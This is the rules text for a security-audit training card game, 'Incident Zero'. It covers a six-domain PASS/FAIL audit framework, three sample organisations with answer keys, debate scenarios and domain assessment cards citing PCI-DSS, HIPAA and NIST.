Teams assess each network using this framework. Scoring (v2.2): PASS/FAIL per domain (X/6) is the primary score. If you use star ratings for flavor, the fixed mapping is 1-2★ = FAIL, 3★+ = PASS, "PARTIAL" counts as FAIL.

Domain 1: Network Segmentation

Question: "Are critical systems isolated?"

Score Criteria
PASS Firewall between zones OR microsegmentation active
FAIL Flat network OR segmentation without enforcement

Domain 2: Access Control & Identity

Question: "Is identity management secure?"

Score Criteria
PASS Dedicated Domain Controller, MFA for remote access, minimal over-privilege
FAIL No DC OR DC overloaded OR no MFA OR broad admin access

Domain 3: Incident Detection & Response

Question: "Can you detect attacks?"

Score Criteria
PASS IDS/IPS or SIEM deployed, covering all critical segments
FAIL No IDS/IPS and no SIEM, OR a critical segment sits outside detection coverage

Domain 4: Backup & Disaster Recovery

Question: "Can you recover from failure?"

Score Criteria
PASS Backup system deployed + tested + geographically diverse
FAIL No backup OR untested backup OR single location

Domain 5: Third-Party Risk Management

Question: "Are cloud/vendor systems managed?"

Score Criteria
PASS Cloud systems isolated OR not handling critical data
FAIL Cloud systems on internet + handling sensitive data + no WAF

Domain 6: Security Operations & Monitoring

Question: "Do you have centralized visibility?"

Score Criteria
PASS SIEM deployed + centralized logging active
FAIL No SIEM OR no centralized logging

Audit Worksheet (inline version — copy onto paper; printed sheet: see print pack, coming)

AUDIT WORKSHEET
Organization audited: ______________________   Auditing team: ______________________

Domain                              PASS/FAIL   Key finding (one line)
1. Network Segmentation             [    ]      ______________________________________
2. Access Control & Identity        [    ]      ______________________________________
3. Incident Detection & Response    [    ]      ______________________________________
4. Backup & Disaster Recovery       [    ]      ______________________________________
5. Third-Party Risk Management      [    ]      ______________________________________
6. Security Ops & Monitoring        [    ]      ______________________________________

SCORE: ____ / 6 PASS      (PARTIAL counts as FAIL; stars: 1-2* = FAIL, 3*+ = PASS)

TOP 3 RECOMMENDATIONS:
1. ___________________________________________________________________________
2. ___________________________________________________________________________
3. ___________________________________________________________________________

Gameplay (20-25 minutes)

Turn Structure

Phase 1: Introduction (2 minutes)

TO explains: "You're security auditors reviewing three organizations' infrastructure designs. For each, you'll score them on a 6-domain framework. Your goal: Identify which has the strongest security posture and which is most vulnerable."

Phase 2: Audit Each Network (5 minutes per network = 15 minutes)

For each network (Startup, Mid-Market, Enterprise):

  1. TO reads network description (2 minutes)
  2. Teams discuss and score (2 minutes)
  3. Vote on PASS/FAIL for each domain
  4. Record scores on the audit worksheet (inline version below; printed version: see print pack, coming)
  5. TO reveals "correct" audit (1 minute)
  6. Teams compare their assessment to expert audit
  7. Discuss differences

Phase 3: Comparative Analysis (5 minutes)

Teams answer: 1. "Which organization is most secure?" 2. "Which is most vulnerable to attack?" 3. "If you HAD to use one network, which would you choose?"


Pre-Built Audit Results

Startup Tech - Audit Results (v2.2 — the answer key now follows its own criteria)

Domain Score Finding
Network Segmentation FAIL No firewall between cloud and on-prem; cloud accessible from internet
Access Control FAIL Dedicated AD exists, but no MFA anywhere (cloud consoles are remote access) — "no MFA" is a FAIL condition
Detection FAIL No IDS/IPS or SIEM
Backup & Recovery FAIL AWS snapshots + M365 retention exist but are untested — "untested backup" is a FAIL condition
Third-Party Risk FAIL Cloud systems public internet-accessible, holding customer data, no WAF
Operations FAIL No centralized monitoring

Score: 0/6 PASS (strict). A lenient auditor might award Access Control a narrow PASS — dedicated, single-purpose DC and no VPN/remote-access paths to on-prem — for 1/6. Either reading lands in the same tier: Below 3/6, HIGH RISK. (The judgment call itself is a great Variation C debate.)

Risk Rating: HIGH / CRITICAL - Vulnerabilities: No network segmentation, no detection capability, no MFA, untested backups, cloud systems exposed - Attack Scenario: Attacker compromises cloud web server → lateral movement to on-prem AD → full network access; if ransomware hits, the untested backups may not restore - Cost of Breach: Very high (no detection, no segmentation to contain, recovery uncertain)


Mid-Market Corp - Audit Results (v2.2 — table and score now agree)

Domain Score Finding
Network Segmentation PASS Firewalls between DMZ, Internal, Finance zones
Access Control PASS AD hardened, VPN with MFA
Detection FAIL IDS + SIEM deployed, but detection-only (no IPS blocking) and the isolated legacy accounting segment sits outside IDS coverage — a blind spot at the highest-risk, unpatched system
Backup & Recovery PASS Backup appliance with off-site replication, tested
Third-Party Risk PASS Cloud systems on private network, WAF in place
Operations PASS SIEM + centralized logging

Score: 5/6 PASS

Risk Rating: MEDIUM - Strengths: Good segmentation, logging, backups - Weaknesses: Legacy accounting system (unpatched, and unmonitored — the Detection FAIL) - Attack Scenario: Attacker may get into DMZ but segmentation blocks lateral movement; an attack routed through the legacy segment, however, could go undetected - Cost of Breach: Moderate (segmentation limits damage; the legacy blind spot is the residual risk)


Enterprise Bank - Audit Results

Domain Score Finding
Network Segmentation PASS Microsegmentation between all critical systems
Access Control PASS Hardened DCs, MFA, minimal over-privilege
Detection PASS IDS/IPS + dual SIEM + honeypot
Backup & Recovery PASS Multiple offline vaults, quarterly testing
Third-Party Risk PASS Cloud only for non-critical, extensive monitoring
Operations PASS Dual SIEM, air-gapped logging

Score: 6/6 PASS

Risk Rating: LOW - Strengths: Defense-in-depth across all domains - Weaknesses: Very expensive to operate; regulatory complexity - Attack Scenario: Multiple layers would have to be bypassed; honeypot would alert SOC immediately - Cost of Breach: Lower (but incident response costs are high due to complexity)


Scoring & Comparison

Audit Score Tiers

Score Assessment Implication
6/6 PASS Enterprise-grade Highest security, highest cost
5/6 PASS Strong security Balanced security & cost
3-4/6 PASS Adequate but gapped Risk exposure present
Below 3/6 High risk Vulnerabilities likely exploited

Team Competition

Which team's audit assessment was most accurate? - Teams that scored Startup as high-risk: +1 point - Teams that scored Enterprise as low-risk: +1 point - Teams that identified Legacy System as Mid-Market's weakness: +1 point

Winner: Team with most accurate audit assessments


Debrief (5 minutes)

Discussion Questions

  1. "Why would Startup Tech be attractive to attackers?"
  2. Answer: No detection, no segmentation, cloud exposed

  3. "If you had to recommend improvements to Startup, what's priority #1?"

  4. Answer: Network segmentation OR IDS/SIEM (detection)

  5. "Why is Enterprise Bank so expensive?"

  6. Answer: Redundancy, microsegmentation, multiple layers of defense

  7. "Which organization would you actually want to work for?"

  8. Answer: Mid-Market (good balance of security and usability)

VARIATION B: RANDOM NETWORK GENERATION

"Build-Then-Audit Mini-Game"

Duration: 25-35 minutes
Players: 1-4 teams
Difficulty: Medium (requires both building and auditing)
Best For: Combined learning, deeper understanding


Concept

"Each team builds a simplified network by drawing random infrastructure cards. Then you audit each other's networks. Better auditors find more gaps."

This combines elements of Network Building (simplified) with Audit mechanics. Teams make trade-off decisions, then their network design is audited by competitors.


Game Flow

Phase 1: Rapid Network Generation (10 minutes)

Each team builds a network using a simplified card deck:

Simplified Network Generation Cards

SERVER CARDS (Draw 5 cards, must include certain types): - Email Server (must have) - Web Server (must have) - Database Server (must have) - Domain Controller (should have) - Backup System (optional) - Development Server (optional) - File Server (optional) - Cloud Workload (optional)

SECURITY DEVICE CARDS (Draw 3 cards, choose to deploy or skip): - Firewall - IDS - SIEM - Email Gateway - WAF - Honeypot

ARCHITECTURE CARD (Draw 1, determines layout): - Flat Network (budget-friendly, weak) - Segmented Network (balanced) - Fully Isolated (expensive, strong)

Rules: - Must have: Email, Web, Database - Can choose: Others - Budget: Implicit (each card represents a choice; no money tracking) - Time: 10 minutes to decide and document on "Network Card"

Each team creates a Network Card:

TEAM A'S NETWORK:

SERVERS:
✓ Email Server
✓ Web Server
✓ Database Server
✓ Domain Controller
✓ Backup System
✓ File Server
✗ Development Server (skipped)

SECURITY DEVICES:
✓ Firewall
✓ IDS
✗ SIEM (skipped)
✓ Email Gateway
✗ WAF (skipped)
✗ Honeypot (skipped)

ARCHITECTURE:
→ Segmented (3 zones)

Phase 2: Cross-Team Audit (15 minutes)

Each team audits a different team's network (round-robin):

  1. Auditing Team Receives Network Card
  2. Auditing Team Scores Network on 6 Domains
  3. PASS or FAIL for each domain
  4. Write findings
  5. Present Audit Results to Building Team

Example Audit of Team A:

AUDIT OF TEAM A'S NETWORK:

Domain 1: Network Segmentation
  Decision: Segmented (3 zones) → PASS
  Finding: Good segmentation between DMZ, Internal, Sensitive

Domain 2: Access Control
  Decision: Domain Controller present → PASS
  Finding: Identity management in place

Domain 3: Detection
  Decision: IDS present but NO SIEM → PARTIAL FAIL
  (v2.2: "PARTIAL" counts as FAIL for the score)
  Finding: Can detect network attacks but no centralized logging for correlation

Domain 4: Backup & Recovery
  Decision: Backup System present → PASS
  Finding: Can recover from data loss

Domain 5: Third-Party Risk
  Decision: No WAF on Web Server → FAIL
  Finding: Web server vulnerable to application attacks

Domain 6: Operations
  Decision: No SIEM → FAIL
  Finding: No centralized monitoring; incident response slower

AUDIT SCORE: 3/6 PASS

CRITICAL FINDINGS:
1. Missing SIEM (no centralized logging)
2. No WAF (web server unprotected)
3. IDS without SIEM (detection blindspot)

Phase 3: Auditor Scoring (5 minutes)

Accuracy of Audits is Scored:

Audit Accuracy Points
Identified all major gaps +5
Identified some gaps +3
Missed critical gap -2
Incorrect assessment 0

Team Scores: - Building Teams: Score = (6 - number of fails) × 5 - Example: 3/6 PASS = 3 fails → 3 × 5 = 15 points - Auditing Teams: Score = accuracy of audit assessment

Winner: Highest combined score OR winner of each category


Debrief (5 minutes)

  1. "What gaps did auditors find in your network?"
  2. "Did the auditors miss anything you're concerned about?"
  3. "What would you fix if you had to improve?"

VARIATION C: "AUDIT THE AUDITOR" DEBATE

Interactive Challenge & Discussion Game

Duration: 20-30 minutes
Players: 2-4 teams
Difficulty: High (requires critical thinking & argumentation)
Best For: Advanced teams, strong discussion-based learning


Concept

"You're given a network design and audit findings. As a team, debate whether the auditor's findings are FAIR, HARSH, or MISSING SOMETHING. Win by making the most convincing argument."

This is a debate game where teams argue the merits of audit findings, teaching that audits are interpretable and that defending infrastructure requires understanding the rationale.


Game Materials

Audit Finding Scenarios (3 total)

SCENARIO 1: "The Startup Defense"

(Same fictional company as Variation A's "Startup Tech": 50 people, cloud-first, no VPN.)

SCENARIO:
Startup Tech built this network:
- Email (Cloud), Web (Cloud), Database (Cloud),
  Domain Controller (On-Prem), Backup (Cloud snapshots)
- No Firewall between cloud and on-prem
- No IDS or SIEM
- No VPN (all cloud-native; cloud consoles protected by
  provider logins only, no MFA)

AUDITOR'S FINDINGS:
Domain 1: Network Segmentation → FAIL
  "No firewall between cloud and on-prem represents 
   uncontrolled lateral movement risk."

Domain 3: Detection → FAIL
  "No IDS/SIEM means attacks go undetected."

OVERALL: HIGH RISK

STARTUP'S COUNTERARGUMENT:
"We use cloud providers (AWS/Azure) which have built-in
firewalls at the cloud level. Cloud provider security
groups mean only the services we expose are reachable.
Our small team (50 people) means we're faster to respond.
This audit is too harsh for a startup."

YOUR JOB:
- Is the auditor FAIR? (reasonable standards)
- Is the auditor HARSH? (too strict for context)
- Is the auditor MISSING gaps? (what should they have found?
  Hint: no MFA, untested backups)
- Vote: Fair / Harsh / Missing / Balanced

SCENARIO 2: "The Legacy System Dilemma"

SCENARIO:
Mid-Market Corp has this system:
- 15-year-old Accounting System (on-prem)
- Runs on Windows Server 2003 (unsupported, unpatched)
- Handles $2B in transactions annually
- Cannot be replaced for 2+ years (licensing/training)
- Isolated on separate network segment but bridged for 
  month-end consolidation

AUDITOR'S FINDINGS:
Domain 2: Access Control → FAIL
  "Legacy system runs on unsupported OS. Vulnerability 
   present = critical risk."

Domain 4: Backup & Recovery → PARTIAL
  "System backed up but no tested recovery procedure."

OVERALL: CRITICAL RISK (specifically legacy system)

CORP'S COUNTERARGUMENT:
"The system is air-gapped except for 3 days per month.
We have detective controls (IDS) watching for suspicious 
access. The cost of replacement ($2M) is greater than 
our risk tolerance. This system is a known risk we're 
accepting."

YOUR JOB:
- Is the auditor RIGHT to flag this?
- Is the corporation taking reasonable risk?
- How would you rate this scenario? Risk Acceptance vs. Negligence?
- Vote: Auditor Correct / Corp Reasonable / Need More Controls / Acceptable Risk

SCENARIO 3: "The Over-Engineering Question"

SCENARIO:
Enterprise Bank built this network:
- 10+ security zones with microsegmentation
- Dual SIEM systems (Splunk + QRadar)
- IDS + IPS on every zone
- Honeypot network with decoys
- All systems hardened per NIST
- Quarterly disaster recovery testing
- Air-gapped offline backups in vault
- Annual compliance audit (PCI-DSS, SOX)

COST: $5M annual IT security budget

AUDITOR'S FINDINGS:
Domain 1-6: ALL PASS ✓

AUDITOR'S COMMENT:
"Exceptional security posture. Well-engineered 
defense-in-depth. Highly resilient. Recommended 
best practices for financial institution."

STAKEHOLDER QUESTION:
"Is this over-engineered? Could we achieve 80% 
of the security with 30% of the cost?"

YOUR JOB:
- Is defense-in-depth always justified?
- What's the cost-benefit breakpoint?
- For different organization types (startup vs. bank), 
  what's appropriate?
- Vote: Over-Engineered / Justified / Right for Context / Too Expensive

Gameplay (25-30 minutes)

Turn Structure

Phase 1: Present Scenario (3 minutes)

TO reads: 1. Organization and network design 2. Auditor's findings 3. Organization's counterargument 4. Debate question

Phase 2: Debate Preparation (5 minutes)

Each team gets assigned a position: - Team A: Defend the Auditor (findings are fair/necessary) - Team B: Defend the Organization (counterargument is valid) - Team C: Play Neutral Assessor (judge fairness of both)

Teams prepare arguments: - 2-3 key points supporting their position - Anticipate opponent's counterarguments - Use security/business logic

Phase 3: Debate Round (5 minutes)

Structure: 1. Auditor Position: 1 minute opening (Team A) 2. Organization Position: 1 minute opening (Team B) 3. Cross-Examination: 2 minutes (back-and-forth) 4. Neutral Assessment: Team C (judge who had better argument)

Phase 4: Judge's Decision & Scoring (2 minutes)

Team C Scores: - Most convincing argument: +3 points - Better use of logic: +2 points - Anticipated counterarguments: +2 points - Clearer presentation: +1 point

Repeat for each scenario (3 scenarios = 3 rounds)


Example Debate

SCENARIO 1: Startup Defense

AUDITOR POSITION (Team A): "The findings are fair because: 1. Network security standards apply to all organizations 2. Cloud provider firewalls don't replace organizational controls 3. No IDS means breaches go undetected for weeks 4. A $10M breach destroys a startup; prevention is essential"

ORGANIZATION POSITION (Team B): "The counterargument is valid because: 1. Startups operate under different constraints than enterprises 2. Cloud provider security groups limit what's exposed 3. Our cloud provider has better security than we could build 4. For 50 employees, a $50K security investment is proportional 5. We're risk-accepting; this is a known trade-off"

CROSS-EXAMINATION (back and forth):

A: "But if you get compromised, your customer data is exposed. Isn't that a problem?"

B: "Yes, but our cloud provider's controls AND limited data make that less likely than you're suggesting."

A: "What about detection? If you're breached, you won't know for months."

B: "True, but adding SIEM costs $5K/month that we don't have. We're choosing early detection (IDS) instead of centralized logging."

C (NEUTRAL): "Who made the better argument?" - Team A cited industry standards - Team B cited resource constraints - Both had merit

VERDICT: Team B made slightly more convincing argument (better contextualization of risk) - Team B: +3 points - Team A: +2 points


Debate Scoring & Winner

After 3 scenarios:

Team Scenario 1 Scenario 2 Scenario 3 TOTAL
Team A (Auditor) 2 3 2 7
Team B (Organization) 3 2 2 7
Team C (Neutral) 3 2 3 8

Winner: Team C (Neutral Assessor)

Award: "Best Critical Thinking"


Debrief (5 minutes)

Key Learning Questions

  1. "Are all audit findings equally valid?"
  2. Answer: No; context matters (startup vs. bank)

  3. "How would you defend an audit finding to the board?"

  4. Teaching point: Audits need business justification, not just technical standards

  5. "What's the difference between a 'critical finding' and a 'risk we're accepting'?"

  6. Teaching point: Risk management is nuanced; not all gaps are equally important

  7. "How does this change how you think about the attacks in Incident Response?"

  8. Connection: "Auditors find gaps that attackers exploit"

USING ALL THREE VARIATIONS

Which Variation When?

Variation A: Pre-Built Networks (Quickest)

Use When: - Limited time (< 30 min session) - First exposure to audit concepts - Want to compare different infrastructure strategies - Non-competitive, educational focus

Learning Value: - Understand how audit domains work - See difference between good/bad designs - Low setup time

Variation B: Random Generation (Balanced)

Use When: - Want to combine building + auditing - 30-40 minute session - Teams benefit from designing then being audited - Competitive element desired

Learning Value: - Teams make trade-off decisions - See consequences of choices reflected in audit - "This gap I chose to accept was exactly what the auditor found!"

Variation C: Debate Game (Most Interactive)

Use When: - Advanced/experienced teams - Want deep critical thinking - Discussion-based learning preferred - Comfortable with argumentation/debate format

Learning Value: - Audit findings are interpretable - Context matters (startup vs. bank) - Security decisions involve trade-offs - Preparation for defending security to board/leadership


SAMPLE PLAY SESSIONS


Session 1: Pre-Built Networks Only (20 minutes)

Setup: 3 min
Audit Startup Tech: 4 min
Audit Mid-Market: 4 min
Audit Enterprise: 4 min
Comparison & Discussion: 3 min
Debrief: 2 min

Total: 20 minutes

Perfect for: Intro to audit concepts


Session 2: Random Generation + Audit (35 minutes)

Setup: 3 min
Teams build networks (simplified): 10 min
Teams audit each other: 15 min
Score & announce winner: 3 min
Debrief: 4 min

Total: 35 minutes

Perfect for: Combined learning, competitive


Session 3: Debate Game Intensive (30 minutes)

Setup & brief: 2 min

SCENARIO 1:
- Presentation: 1 min
- Prep: 3 min
- Debate: 5 min
- Scoring: 1 min
- Subtotal: 10 min

SCENARIO 2: 10 min
SCENARIO 3: 10 min

Debrief: 3 min

Total: 30 minutes

Perfect for: Advanced critical thinking


Session 4: Combination Play (60 minutes)

Variation A (Pre-Built): 20 min
- Understand audit domains via 3 sample networks

Variation B (Random Gen): 25 min
- Build network, get audited
- See your choices reflected in audit findings

Variation C (Debate): 10 min
- Single debate scenario to reinforce learning

Debrief & Connection: 5 min
- "Now you understand how audits work"
- "In Incident Response, attackers will exploit these gaps"

Total: 60 minutes

Perfect for: Comprehensive audit education


CONNECTING TO INCIDENT RESPONSE (Attack Chain)

After playing Audit Standalone, teams can transition to the Incident Response module:

Narrative Bridge:

"You just audited how well different organizations designed their security. Now let's see what happens when an attacker encounters those same networks. The gaps you found in the audit? Attackers will find them too.

Your audit findings were: - Startup Tech: HIGH RISK (no segmentation, no detection) - Mid-Market: MEDIUM RISK (strong foundation, legacy gap) - Enterprise: LOW RISK (defense-in-depth)

Now, if an attacker targets each of these networks, how will it go?"


MATERIALS CHECKLIST

Everything needed to play today is in this document: the three network descriptions, the 6-domain framework, the answer keys, the inline audit worksheet, and the three debate scenarios. Printed play aids (scoring reference card, audit worksheet, judge guide, scoring sheets): see print pack (coming).

Variation A: Pre-Built Networks

Variation B: Random Generation

Variation C: Audit the Auditor


QUICK REFERENCE

Variation Duration Complexity Competition Setup
A: Pre-Built 15-25 min Low Low Minimal
B: Random Gen 25-35 min Medium Medium Moderate
C: Debate 20-30 min High High Moderate

DEBRIEF CONNECTIONS TO INCIDENT ZERO

After any Audit Standalone variation, teams should understand:

  1. Audits find real vulnerabilities - Same gaps auditors find, attackers will exploit
  2. Context matters - Startup vs. bank = different risk tolerance
  3. Trade-offs are real - Can't afford everything; must prioritize
  4. Detection vs. Prevention - Strong IDS/SIEM matters as much as hardening
  5. Incident response starts with audit - Knowing your gaps speeds detection

Key Teaching: "In Incident Response, auditors played the role of the security team. Attackers play the same role, but with opposite intent. They're looking for exactly what auditors find."


Incident Zero: Compliance Audit Standalone Mini-Games
Three variations of security assessment gameplay
Teach how audits find vulnerabilities that attackers will exploit

cards/audit-compliance/core-deck/audit-domain-cards.md

Audit & Compliance Module: Audit Domain Assessment Cards

Version: 2.2 - Playtest Edition Last Updated: October 2025


Overview

Audit Domain Assessment Cards represent six critical security domains that an organization must have controls for. Each domain is assessed independently, with findings recorded on a standard audit report.


Assessment Methodology

The Audit Process

  1. Assessment: Auditor reviews domain for evidence of controls
  2. Scoring: Rate domain 1-5 stars based on maturity
  3. ⭐ (1 star): No controls, critical findings
  4. ⭐⭐ (2 stars): Minimal controls, major findings
  5. ⭐⭐⭐ (3 stars): Adequate controls, minor findings
  6. ⭐⭐⭐⭐ (4 stars): Strong controls, few findings
  7. ⭐⭐⭐⭐⭐ (5 stars): Excellent controls, no findings
  8. Findings: Record specific gaps (vulnerabilities, non-compliance)
  9. Remediation: Recommend actions to address findings
  10. Report: Compile audit findings and recommendations

Star → PASS/FAIL Mapping (v2.2)

PASS/FAIL per domain (X/6) is the primary score. Stars are flavor, with this fixed mapping:

1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL

Scoring Impact

Domain Score determines: - Audit Grade (1-5 stars, flavor) - PASS/FAIL status (primary — via the mapping above) - Findings Severity (critical/major/minor) - Modifiers for other modules (IR, DR get harder if audit failed — see the canonical table in docs/rules/module-audit-compliance.md)


Audit Domain Cards

DOMAIN-01: Network Segmentation & Isolation

Focus: How well is network divided into protected segments? Critical For: Preventing lateral movement Regulatory References: PCI-DSS (network segmentation), NIST (zero trust)

What's Assessed: - Is network flat (1 segment) or segmented (multiple segments)? - Are sensitive systems isolated (DMZ, database segment, admin segment)? - Are firewall rules enforced between segments? - Is network architecture documented? - Are VLANs/subnets properly configured?

Typical Findings: - Critical (1-2 star): Flat network, no segmentation, everything can talk to everything - Major (2-3 star): Basic segmentation exists, but enforcement is weak - Minor (3-4 star): Segmentation exists, few rule violations - Compliant (4-5 star): Strong segmentation, zero-trust architecture

Real-World Question: "If one system is compromised, how far can the attacker spread?" - Flat network: Entire organization immediately - 3-zone network: Blocked by firewalls - Zero-trust: Individual systems isolated

Audit Evidence: - Network diagram (shows segments) - Firewall rule documentation - Network ACL lists - Proof of implementation (switch configs) - Test results (can systems cross segments? No)

Compliance Standards: - PCI-DSS Requirement 1: Network segmentation for cardholder data - NIST CSF: PR.AC-5 (Network integrity protected via segmentation) - CIS Control 12: Network Infrastructure Management (v8)

Findings Template:

FINDING: Network segmentation inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: The network is [flat/minimally segmented], allowing [lateral movement/unauthorized access]
RECOMMENDATION: Implement [VLAN/firewall rules/zero-trust] to segment [database/admin/sensitive systems]
EFFORT: [1-5] weeks
COST: [Moderate/High/Very High]

Remediation Actions: - ✓ Implement network segmentation (ARCH-02, ARCH-03 in Network Building) - ✓ Deploy firewall with segmentation rules (SEC-08) - ✓ Implement zero-trust architecture (ARCH-03) - ✓ Test segmentation enforcement

Impact if Failed (1-2 stars): - T-04 (Lateral Movement) becomes trivial for attackers - Incident Response: -1 to NETWORK defenses (canonical modifier) - Disaster Recovery: -10 DR budget penalty (attacker spreads widely)


DOMAIN-02: Access Control & Identity Management

Focus: How are user identities managed and access controlled? Critical For: Preventing unauthorized access Regulatory References: HIPAA (access controls), GDPR (access management)

What's Assessed: - Is there centralized identity management (Domain Controller/Azure AD)? - Is multi-factor authentication (MFA) enabled for sensitive access? - Are access permissions based on least privilege? - Are access reviews performed (verify who has access)? - Are privileged accounts managed (admin accounts, service accounts)?

Typical Findings: - Critical (1-2 star): No centralized identity, weak passwords, no MFA - Major (2-3 star): Some identity management, MFA not universal - Minor (3-4 star): Good identity management, minor gaps - Compliant (4-5 star): Strong identity, MFA everywhere, privilege management

Real-World Question: "How easily can an attacker use stolen credentials?" - Weak: No MFA, can use stolen password immediately - Medium: MFA only for some systems - Strong: MFA everywhere, weak credentials are useless

Audit Evidence: - AD/directory configuration - MFA enrollment status - Access policy documentation - Privileged account audit (who has admin?) - Account review records (periodic access verification)

Compliance Standards: - PCI-DSS Requirement 8: User identification and authentication - HIPAA Rule 164.308(a)(4): Unique user identification - NIST CSF: PR.AC-1 (Physical & logical access controls)

Findings Template:

FINDING: Multi-factor authentication not universally enforced
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: MFA is [not implemented/optional] for [VPN/email/admin access]
RECOMMENDATION: Deploy [MFA solution] to [affected systems]
EFFORT: [2-4] weeks
COST: [Low/Moderate/High]

Remediation Actions: - ✓ Deploy MFA (D-07 in Hardening) - ✓ Implement password vault (D-12) - ✓ Credential Guard for privileged access (D-16) - ✓ Access reviews quarterly

Impact if Failed (1-2 stars): - T-03 (Compromised Credentials), T-06 (Mimikatz) become likely - Incident Response: -1 to CREDENTIAL_ABUSE defenses (canonical modifier) - Disaster Recovery: -15 DR budget penalty (attacker can restore themselves with stolen creds)


DOMAIN-03: Threat Detection & Incident Response

Focus: Can the organization detect and respond to attacks? Critical For: Finding breaches quickly Regulatory References: GDPR (breach detection), HIPAA (log monitoring)

What's Assessed: - Are logs being collected centrally (SIEM or similar)? - Is there 24/7 monitoring of critical systems? - Are alerts configured to detect suspicious activity? - Is there incident response plan documented? - Are incident responders trained?

Typical Findings: - Critical (1-2 star): No logging, no monitoring, no incident response plan - Major (2-3 star): Some logging, limited monitoring - Minor (3-4 star): Good logging, some gaps in alerting - Compliant (4-5 star): Comprehensive logging, active monitoring, trained team

Real-World Question: "How quickly will you detect an active attacker?" - Poor: Days/weeks (after data is already stolen) - Medium: Hours (after attacker has spread) - Strong: Minutes (catch attacker early)

Audit Evidence: - SIEM/logging configuration - Alert rules documentation - Incident response plan - Training records (who's trained?) - Incident history (how did you detect past incidents?)

Compliance Standards: - GDPR Article 33: Breach notification timing (72 hours) - HIPAA Rule 164.308(a)(6): Incident response procedures - NIST CSF: DE.AE-3 (Event detection processes)

Findings Template:

FINDING: Insufficient threat detection and monitoring
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [SIEM/monitoring] is [not deployed/inadequately configured]
RECOMMENDATION: Deploy [SIEM] with [alert rules] to detect [attack patterns]
EFFORT: [4-8] weeks
COST: [Moderate/High]

Remediation Actions: - ✓ Deploy SIEM (D-09, D-22) - ✓ Configure log centralization (D-05) - ✓ Create SIEM correlation rules (D-10) - ✓ Threat hunting program (D-13)

Impact if Failed (1-2 stars): - Breach detection is late (attacker has time to steal data) - Incident Response: -1 to Investigation rolls (canonical modifier; late detection) - Disaster Recovery: -10 DR budget penalty (dwell time longer; more data stolen)

Optional (v2.2): a 5-star rating in this domain grants +1 to Incident Response investigation rolls if IR is played later.


DOMAIN-04: Backup & Disaster Recovery

Focus: Can the organization recover from attacks/disasters? Critical For: Ransomware resilience Regulatory References: Most breach laws mention recovery

What's Assessed: - Is there a documented backup strategy (frequency, retention)? - Are backups tested regularly (restore actually works)? - Is backup storage off-site (geographically separated)? - Are backups immutable (cannot be deleted/encrypted)? - Is recovery time objective (RTO) documented for each system?

Typical Findings: - Critical (1-2 star): No backups or untested backups (may not restore) - Major (2-3 star): Backups exist but not properly tested - Minor (3-4 star): Backups exist and tested, gaps in immutability - Compliant (4-5 star): 3-2-1 strategy, tested, immutable, offsite

Real-World Question: "Can you recover from ransomware?" - Poor: No (backups are encrypted too) - Medium: Yes but slowly (days to recover) - Strong: Yes quickly (hours to recover, immutable backups)

Audit Evidence: - Backup schedule/documentation - Backup test results (prove restore works) - Off-site backup location documentation - Immutable backup configuration - Recovery time estimates

Compliance Standards: - Most breach laws assume backups exist (no recovery = massive damage) - HIPAA Rule 164.308(a)(7): Data backup procedures - NIST CSF: PR.IP-4 (Resilience practices documented)

Findings Template:

FINDING: Backup and recovery procedures inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: Backups are [not tested/not off-site/not immutable]
RECOMMENDATION: Implement [3-2-1 strategy] with [immutable storage]
EFFORT: [2-4] weeks
COST: [Moderate]

Remediation Actions: - ✓ Implement 3-2-1 backup strategy (D-19) - ✓ Test backups quarterly (prove restore works) - ✓ Immutable storage (WORM, cloud versioning) - ✓ Off-site backup location

Impact if Failed (1-2 stars): - Ransomware attacks cannot be recovered from - Disaster Recovery: -25 DR budget penalty (no recovery option; expensive rebuild) - Business interruption is long (days vs hours) - No IR effect (matters in Disaster Recovery)


DOMAIN-05: Third-Party Risk & Cloud Security

Focus: How well are vendors and cloud services managed? Critical For: Managing supply chain risk Regulatory References: GDPR (processor accountability), PCI-DSS (vendor security)

What's Assessed: - Is there a vendor management program? - Are vendors required to meet security standards? - Are vendor assessments conducted (security questionnaires, audits)? - Are cloud configurations secured (IAM, encryption, monitoring)? - Is data residency managed (where is customer data stored)?

Typical Findings: - Critical (1-2 star): No vendor management, cloud misconfigured - Major (2-3 star): Basic vendor management, cloud gaps - Minor (3-4 star): Vendor management exists, minor gaps - Compliant (4-5 star): Strong vendor program, cloud security

Real-World Question: "Is your vendor secure?" - Poor: No idea (never asked them) - Medium: They said they're secure (took their word) - Strong: Assessed and monitored (ongoing verification)

Audit Evidence: - Vendor management policy - Vendor security questionnaires - Cloud configuration documentation - IAM policies for cloud access - Data residency mapping

Compliance Standards: - GDPR Article 28: Processor agreements (vendor security required) - PCI-DSS Requirement 12.8: Service provider agreements - NIST CSF: ID.SC (Supply Chain Risk Management)

Findings Template:

FINDING: Vendor and cloud security assessment inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Vendor/Cloud] security is [not assessed/misconfigured]
RECOMMENDATION: Implement [vendor assessment process/cloud security hardening]
EFFORT: [3-6] weeks
COST: [Low/Moderate]

Remediation Actions: - ✓ Vendor management program (SLAs, security requirements) - ✓ Cloud security posture management (CSPM tools) - ✓ Cloud IAM hardening (least privilege) - ✓ Regular vendor assessments

Impact if Failed (1-2 stars): - SCENARIO-03 (Supply Chain Compromise) becomes likely in Disaster Recovery - Vendor breach affects your customers - Liability disputes (who's responsible?) - Incident Response: -1 to WEB_EXPLOIT defenses (canonical modifier) - Disaster Recovery: -20 DR budget penalty (cloud provider recovery needed)


DOMAIN-06: Security Operations & Monitoring

Focus: How is security operationalized (day-to-day)? Critical For: Sustained security posture Regulatory References: Most frameworks mention continuous monitoring

What's Assessed: - Is there a dedicated security team (CISO, analysts)? - Are security meetings held regularly? - Is vulnerability scanning done regularly? - Are patches applied timely? - Is security training conducted?

Typical Findings: - Critical (1-2 star): No security team, no updates, no training - Major (2-3 star): Small security team, infrequent patching - Minor (3-4 star): Security team exists, good operations - Compliant (4-5 star): Mature security operations, continuous improvement

Real-World Question: "Is security a priority for the organization?" - Poor: No dedicated resources - Medium: Part-time effort - Strong: Dedicated team, empowered leadership

Audit Evidence: - Org chart (is CISO position filled?) - Security meeting minutes - Vulnerability scan reports - Patch management records - Training records

Compliance Standards: - Most frameworks require security leadership - NIST CSF: PR.IP-1 (Security policy established & communicated) - CIS Control 17: Incident Response Management (v8)

Findings Template:

